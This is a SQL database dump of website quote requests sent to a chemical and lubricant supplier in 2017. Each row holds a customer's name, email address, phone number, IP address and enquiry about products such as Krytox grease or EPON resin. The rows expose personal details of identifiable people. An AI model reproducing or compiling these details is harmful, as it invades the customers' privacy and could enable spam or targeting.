INSERT INTO `wp_enquiry_detail_new` VALUES (735, 'Julian Stormes', 'shop@agile-manufacturing.com', 'Price quote for 1 tube. Are there different sizes? Is there a quantity discount?\n\nThank you', '', 'Krytox GPL206', '208.74.209.105', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"790";s:5:"title";s:7:"GPL 206";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_448241593.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-30 15:15:30', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (736, 'Tim', 'tim.longino@gpinflation.com', 'Hi please quote 2 tubes of Krytox, 240AZ GD1', '941724-3338', '240az GD1', '24.73.65.206', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"638";s:5:"title";s:5:"240AZ";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_300460277.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-30 15:42:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (737, 'Scott Fisher', 'fishers@zin-tech.com', 'Can I please get a price quote for one 4-oz tube of Krytox XHT-BDX.\n\nThank you,\nScott Fisher\nZIN Technologies Inc', '440625-2339', 'Price Quote', '96.27.108.162', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"697";s:5:"title";s:7:"XHT-BDX";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_105938183.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-30 17:45:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (738, 'lingyu li', 'lingyu.li@meliorinnovations.com', 'Hi,\nwe\'d like to find out bulk pricing for scaling up one of our new product and cost model  ', '', '', '208.125.80.66', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"427";s:5:"title";s:7:"VAZO 64";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VAZO-64-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-30 20:28:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (739, 'Frank Toledo', 'franktoledo0@gmail.com', 'Hello,\n\nI am looking for a two part epoxy resin solution for a table top. Something that will self level and have a clear gloss. \n\nThanks\nFrank', '587892-6690', 'Epoxy resin', '24.114.22.3', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"918";s:5:"title";s:17:"EPON™ 1001-X-75";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-30 23:13:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (740, 'Yuri Verbruggen', 'y.verbruggen@composites.nl', 'Dear sir, madam,\n\nI would like to receive a ROM quote for 5 and 55 gallon drums of MS-143TE. \n\nWhat is the potlife of the release agent?\n\nWith best regards, \n\nYuri Verbruggen\nDutch Thermoplastic Components', '', 'ROM Quote MS-143TE', '87.195.100.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"303";s:5:"title";s:8:"MS-143TE";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143TE.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-31 08:15:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (741, 'hongfan ji', 'hongfan.ji@gdcopperusa.com', 'please send me quote', '334637-0243', 'MS-530N', '12.151.233.234', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1292";s:5:"title";s:23:"MS-530N Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/contact-cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-31 16:33:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (742, 'Lou Peragine', 'lperagine@cleverdevices.com', 'I used this product at another company years ago; I waned to show the guy\'s in production this for possible future use. Can I get a sample or two? Thanks, Lou', '516707-0713', 'MS-907 Two-Part Epoxy ', '174.44.220.211', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-31 17:37:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (743, 'Kara Brower', 'kbrower@stanford.edu', 'Hi, \n\nWe are interested in using Krytox for microfluidic applications in fluorinated oil. Do you recommend 157 FS(H) versions? Could we receive a quote for your 2 smallest sizes? \n\nThank you!\nKara\n', '443880-5388', 'Krytox FS(H) 157 Inquiry', '171.66.208.145', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-31 22:46:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (744, 'Radoslaw Bozek', 'bozekrad@gmail.com', 'I would lie to purchase a bottle for cleaning purposes.\ni need to dissolve PLA out of my nozzles for 3d printer.', '+4796842465', 'a bottle for cleaning nozzles', '193.69.199.116', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-01 13:19:50', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (745, 'David Hiza', 'dkhiza@operamail.com', 'How do I  order a case?', '678357-7782', '', '66.87.101.8', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-01 20:35:10', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (746, 'hong zhang', 'hzhang@brewerscience.com', 'Hi,\nI am interested in the releasing properties of MS-153. It is possible to blend this product within some organic formula? Can you give me a quote? Because my project is at R&amp;D stage, can I get some free sample? Thank you very much.', '573364-0300', 'quote of MS-153', '67.210.180.2', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"308";s:5:"title";s:6:"MS-153";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Boron-nitride.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-03 14:05:00', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (747, 'Patrick Walter', 'Patrick@rmiusa.org', 'We work on Medical Oxygen/Air Mixing Devices and would be using a lubricant to lubricate orings inside the oxygen blender, subject to upwards of 100 PSI of 100% medical grade oxygen.', '913948-0789', 'GPL 106 Pricing', '136.32.174.187', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"441";s:5:"title";s:7:"GPL 106";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:91:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease-pfpe.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-03 19:59:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (748, 'Savanna Robertson', 'savanna.robertson@spacex.com', 'Do you sell this product in a 2 oz syringe? Please let me know.\n\nThank you\nSavanna', '806316-0015', '240AC Syringe -- 2oz', '192.31.242.194', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-03 21:15:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (749, 'Baz', 'baz.askari@gmail.com', 'Hi \nI\'m Baz from NRSIGN company. can Fluoropolymer used for insulation the stainless wire. May I have the price of this product.\n\n', '+1778-991-4403', 'asking price ', '207.23.252.11', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"469";s:5:"title";s:30:"Fluoropolymer Medical Coatings";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:105:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Fluoropolymer-coating-Catheter-guidewire.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-03 22:53:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (750, 'Chris Fish', 'cnf500@gmail.com', 'We would like to get pricing on the;\nEpon 862 in qts, gal, 5 gal &amp; 55gal \n\nAlso the;\nW cure agent in qts, gal, 5 gal, 55 gal\n\nAlso the pricing of the Epon 828 in qts.\n\nThank you,\nChris Fish\nJen-Tek, LLC', '541944-7056', '862 &amp; W cure agent', '71.11.72.165', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-03 23:49:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (751, 'Gavrilo Šekularac', 'gavrilo.sekularac@ijs.si', 'Dir Sir/ madam,\nI am from Slovenia and i am interested in buying \nEPON 828 - epoxy resin and epikure F205 - hardner as a top coating application for aluminium alloys in scientific purpose . I would need 5 to 10 galons of both. ', '+38614773426', 'Epon 828 + epicure F205 ', '194.249.230.81', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-04 08:21:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (752, 'brenda raymond', 'brenda.raymond@ametek.com', 'could you please quote various small sizes(up to a pound)', '203756-7441', 'Krytox gpl226', '50.232.86.150', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"850";s:5:"title";s:7:"GPL 226";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_92739160.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-04 12:40:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (753, 'Justin Stailey', 'justin.stailey@navy.mil', 'I was wondering if I could get a quote for 2 tubes of the Krytox 240AC Grease. Thanks and have a great day!', '360627-6805', 'Krytox 240AC', '138.163.106.71', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-04 14:53:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (754, 'Justin Lair', 'jlair@linamar.com', 'Could you please provide a quote for the MS-555?  Please include lead time.\nThank you.', '248473-3280', 'Quote Please', '97.78.166.180', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-04 15:57:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (755, 'Emilio', 'emilio.rodriguez@ii-vi.com', 'Price and minimum order (qty)\n\nThanks,\n\nEmilio ', '214994-2340', 'MS-122AD', '70.253.148.170', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-04 16:41:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (756, 'Lynette Metdepenningen', 'gcref01@gmail.com', 'looking for  a cartridge or tube ', '704395-1344', 'need pricing', '69.132.22.58', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2746";s:5:"title";s:24:"227 FG Corrugator Grease";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_373451461.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-04 18:35:53', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (757, 'ANGELA JACKSON', 'angelawj@maximumaerosupport.com', 'Hi,\nI am looking for 12 cans of DRy Film Lubricant PN MS-122AD, 14oz Aerosol cans.\n\nThank you very much\nAngela Jackson\nMaximum Aero Support\nangelawj@maximumaerosupport.com', '1818-826-3468', 'REQUEST FOR PRICING AND AVAILABILITY', '198.72.226.1', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-04 19:20:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (758, 'Jackie Smith', 'jsmith@americanthermal.com', 'We are interested in purchasing Epikure 3223. Please provide sales quantities and price breaks. Do you accept credit cards, purchase orders, offer Net 30 day terms?\nThanks so much!', '937242-7928', 'Epikure 3223', '209.152.212.74', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1183";s:5:"title";s:15:"EPIKURE™ 3223";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3223.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-04 19:35:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (759, 'Anthony Perrino', 'tonyshack@nycap.rr.com', 'Inquiring about a price for this product and if it is possible to purchase this directly from this site at MS?\nThanks, Tony P.', '', 'MS-530N Contact Re-Nu', '69.204.166.69', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1292";s:5:"title";s:23:"MS-530N Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/contact-cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-05 02:37:46', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (760, 'Jeffrey Nichols', 'jeff.nichols@broadcom.com', 'Please  let me know how I can order a Case (I believe there are 12 cans in it) of the MS-222N AeroDuster.\n\nThanks,\nJeff Nichols', '970288-4011', 'MS-222N AeroDuster', '192.19.218.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-05 17:45:30', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (761, 'austin', 'austinmaeda@gmail.com', 'can you quote me for Krytox103 and 104 in 0.5kg  size shipping to  zip 92395.\n\nThanks.', '323487-1199', 'price quote.', '76.170.162.146', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"438";s:5:"title";s:7:"GPL 103";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease3.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-05 18:35:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (762, 'Sean Hu', 'purchase@echochemical.com', 'Dear sir,\n\nPlease kindly quote 1L * 1 to Taiwan, or please advise the nearest distributor if you are not able to ship to Taiwan, thank you!', '', 'Please quote quantity 1 to Taiwan', '211.75.203.2', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-06 01:39:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (763, 'Bryan Chua Teik Swee', 'trigloba@gmail.com', 'Please quote the best price to us for aero duster ms 222n.\n\nTQ\nBryan Chua (H/P : 6012-4706035)', '', 'Provide Quotation', '175.144.150.59', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-06 06:58:58', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (764, 'Bill morgan', 'wedayne26@gmail.com', 'Looking for oil lube to grease wheel bearing on racing karts  I need the kind that comes in a spray can. The best you have please and a price Thank You  ', '865761-0460', 'Wheel Bearing Libricant', '24.107.252.17', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"993";s:5:"title";s:6:"XP 1A1";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-bearing-oil-grease-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-06 15:35:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (765, 'Kyle Caldwell', 'kcal@uw.edu', 'Hello,\n\nI\'m looking for a simple quote for 1 gallon of Epon 828. It\'s for use at in a university research group (if there\'s any sort of academic discount) at the University of Washington, Seattle. We have all the curing agents we\'ll need.\n\n-Kyle Caldwell\nPhD candidate\nJohn C. Berg research group\nUniversity of Washington, Seattle\n', '1858-220-2223', 'EPON 828 inquiry for 1 gallon jug - academic use', '108.179.147.137', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-06 17:02:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (766, 'Rick O\\\'Sammon', 'cactusthorn@spiderpaw.com', 'how much is the resin with the hardener', '520560-1841', 'cost', '199.66.168.124', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"842";s:5:"title";s:11:"EPON™ 825";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-06 17:43:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (767, 'HEATHER STORY', 'PURCHASING@THEFUELCELL.COM', 'Can you give me pricing and lead time on Krytox 283AD in a couple of different sizes?\n\nThank you\nHeather\n', '954776-7555', 'KRYTOX 283AD', '50.78.120.89', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"656";s:5:"title";s:5:"283AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:97:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-grease-aerospace-aviation.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-06 18:56:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (768, 'Cyprien CORREDERA', 'cyprien@cambridge-technologies.com', 'Hi,\nCan you please advise price and availability on :\nKRYTOX GPL-226 TUBE 8OZ  x2\n\nThanks and regards,\nCyprien Corredera', '+33783340586', 'KRYTOX GPL-226 TUBE 8OZ  ', '83.193.21.54', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"850";s:5:"title";s:7:"GPL 226";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_92739160.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-07 09:11:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (769, 'Nico Graafland', 'purchasing@spectoaerospace.com', 'please quote me 1ea purchase Epikure 3290', '+31854883674', 'purchase Epikure 3290', '37.153.250.15', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1198";s:5:"title";s:15:"EPIKURE™ 3290";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-07 09:14:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (770, 'Yomarie Aviles', 'yomarie.aviles@upr.edu', 'Please send a quote.\n\nI will like to know if this can be applied while mold is operating and with temperatures between 300-350F.\n\nAnd I will like to revise the SDS.\n\nThanks,', '', '', '192.104.67.121', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"3787";s:5:"title";s:25:"ReleaSys HT (Water-Based)";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2017/03/shutterstock_442773265.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-07 14:10:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (771, 'Mark Gastmeier', 'mark@sgsmallwood.com', 'We need to purchase initially a small quantity of this for use as a mold release.', '519894-2280', 'MS-122AD ', '72.139.64.210', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-07 16:01:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (772, 'Randi Tibbetts', 'randi@ptiassembly.com', 'Good afternoon,\nI need this product ASAP, can you provide a price and lead time please.', '214343-0131', 'QUOTE/PO', '216.59.207.226', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1673";s:5:"title";s:7:"MS-124H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:93:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant-tribosys.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-07 19:14:21', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (773, 'Thomas', 'tccacrl@gmail.com', 'What is the vapor pressure for AGL 683.  I need a very low vapor pressure lubricant for a bearing in a vacuum environment', '925784-7557', 'outgassing rate', '98.238.235.114', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1072";s:5:"title";s:7:"AGL 683";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/gearbox-grease-krytox-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-07 19:44:44', '', NULL, '', '', '', NULL, '', ''); 
